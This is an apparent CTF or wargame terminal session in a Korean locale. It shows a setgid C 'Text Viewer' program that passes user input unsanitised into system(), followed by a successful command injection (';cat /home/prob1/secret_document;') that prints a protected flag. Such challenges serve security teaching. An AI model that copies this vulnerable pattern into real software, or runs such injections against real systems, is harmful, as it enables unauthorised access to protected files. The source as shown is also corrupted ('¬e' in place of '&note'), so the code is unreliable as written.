prob1@tmp-jinyong-server:~$ ls -l
합계 24
drwxr-xr-x 2 root root 4096 11월 29 08:49 notes
-rwxr-sr-x 1 root solved_prob1 8817 11월 29 08:06 prob1
-rw-r--r-- 1 root root 468 11월 29 08:06 prob1.c
-r--r----- 1 root solved_prob1 43 11월 29 08:50 secret_document
prob1@tmp-jinyong-server:~$ cat ./prob1.c
#include <stdio.h>
#include <string.h>
int main() {
char cmd[256];
char *note;
size_t size;
puts("Text Viewer");
while(1) {
note = 0;
size = 0;
puts("Select note:");
system("/bin/ls -al /home/prob1/notes/|/usr/bin/tail -n +4");
getline(¬e, &size, stdin);
if(strstr(note, "\n") != 0)
*strstr(note, "\n") = 0; // remove newline
printf("%s", note);
snprintf(cmd, 256, "/bin/cat /home/prob1/notes/%s.txt", note);
system(cmd);
}
return 0;
}
prob1@tmp-jinyong-server:~$ ./prob1
Text Viewer
Select note:
-rw-r--r-- 1 root root 8 11월 29 08:49 diary.txt
;cat /home/prob1/secret_document;
/bin/cat: /home/prob1/notes/: 디렉터리입니다
directory_traversal_flow_is_easy_to_attack
sh: 1: .txt: not found
;cat /home/prob1/secret_document;Select note:
-rw-r--r-- 1 root root 8 11월 29 08:49 diary.txt